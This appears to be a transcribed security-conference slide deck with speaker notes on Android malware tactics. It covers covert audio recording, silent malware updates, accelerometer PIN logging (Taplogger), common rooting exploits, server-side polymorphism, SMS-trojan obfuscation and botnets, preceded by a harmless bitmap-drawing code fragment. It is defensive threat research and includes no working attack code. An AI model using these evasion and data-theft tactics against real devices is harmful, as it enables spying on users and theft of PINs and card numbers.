int i1 = m;
int i2 = n;
if (i1 > i2)
{
i3 = localBitmap2.getWidth();
i4 = localBitmap2.getHeight();
label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888;
localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig);
Canvas localCanvas = new Canvas(localBitmap3);
float f1 = 0.0F;
float f2 = 0.0F;
Paint localPaint1 = null;
localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1);
float f3 = 100.0F;
float f4 = 300.0F;
Paint localPaint2 = null;
localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2);
}
16. 4/19/1216
Attacker Tricks – Recording Audio
• Audio
– DTMF(“Touch Tones”)
– Telephone Calls
• Initially used in academic PoCs
– SoundComber
• DB of IVR Converted DTMF
• January 2011
• Very common in spyware
• Used in malware
17. 4/19/1217
Attacker Tricks – Recording Audio
• Android/Nickispy
– Records to AMR files
– August 2011
• Android/GoldenEagle
– Records to AMR files
– September 2011
• Audio recording benefits
– Trade secrets
– CC#
– PINs
18. 4/19/1218
Attacker Tricks - Malware Updates
• Malware authors are now including update functionality
– Keeping the profits rolling in and maintaining control of devices
– Initially just used by mobile botnet clients
• Generally only requires the permission INSTALL_PACKAGES
• android.permission.INSTALL_PACKAGES
• There are two main ways users are attacked
– Fake legitimate updates
• Ex: SYSTEM_PATCH, Android_4.0_patch
• Really just trojan horses
– Malware updating itself
• More functions
– Send sensitive user info
– Exfiltrate data
• New/patched payloads
– Exploits
19. 4/19/1219
Attacker Tricks - Malware Updates
• Real malware updates
– Because even the bad guys understand that sometimes you need to patch
• Usually not visual
– Don't inform the users/victims
– Don't depend on users to approve updates
20. 4/19/1220
Academic Research - Taplogger
• Taplogger
– Combination training and attack app
• Reads accelerometer for keypresses
• Training app is a fake icon matching game
– High score = trained it to steal your pin
• Two attacks
– Number pad logging
» PINs, CC#s,etc.
– Password stealing
» Screen unlock
– Previous research
• Touchlogger
– Two parts – training and logging
• ACCessory
– Detects full keyboard
22. Attacker Tricks - Rooting Exploits
• Rooting Android
– Good for improving security, but can leave you open to attack
– Replacing firmware
– Removing bloatware and security vulnerabilities
• Most attackers are not interested in developing their own exploits
– Function of slow patching on Android and number of parties involved in
releasing new firmware
• “too many chefs in the kitchen”
– Leads to the same three or four common exploits and minor modifications
Exploit Detected as
PSneuter Exploit/RetuenSP.A
Gingerbreak Exploit/Voldbrk, 18 minor variants of the
same exploit
Exploid Exploit/Lvedu, 26 minor variants
RageAgainstTheCage Exploit/Diutes, 5 minor variants
23. Attacker Tricks – Server-Side Polymorphism
• Server-side
– Uses larger resources server side vs. lower powered devices
– Modifying DEX files
• Manual changes
– Renaming source and recompiling
• Automated changes
– Easier than it sounds
– Scriptable text changes in source
24. Attacker Tricks – Server-Side Polymorphism
• One major family: Android/FakeInstaller
• Main generic signature
• Supplementary detections for 25 variants
• Changes
– By day
– By hour
A lot of SMS sending trojans use very simple encryption or obfuscation.
The top one hides the SMS number and message in a standard HTML file. It looks like the attacker possible modified a standard Microsoft provided HTML file. If you&apos;re not looking for it you&apos;d miss it.
Others use very simple substitution ciphers. All of this just to make it less obvious what the SMS number and message are.
Of course if you have the binary, these are easy to reverse.
More advanced malware uses better algorithms like DES. Geinimi uses DES to encrypt its CC traffic and URL queries.
This is a research PoC. It&apos;s in two parts, a desktop application to identify keystrokes from accelrometer readings and eventually an app that uses the derived keystroke/touch databse to identify indiividual numbers.
Future imporvements include expanding from a custom keyboard to the default on-screen keyboard and identification of letters.
The attacker profits initially by identifying when numbers are enterd These can be cc#, SS# or PINs. Future work could capture passwords, acount names and other sensitive data.
Botnets are pretty straightforward. They&apos;re basically client server networks where the clients are infected machines. An attacker infects a large number of machines or devices and then has their command and control server.
Command and control can varie from the simple single server to a network of redundant servers.
Botnets are good for performing attacks against targets(ddos, phishing, etc.) and for gathering informatin, Personally identifiable information, financial records and other confidential informatioon.
Depending on how complex they are the botnet clients may also utilize features of rootkits.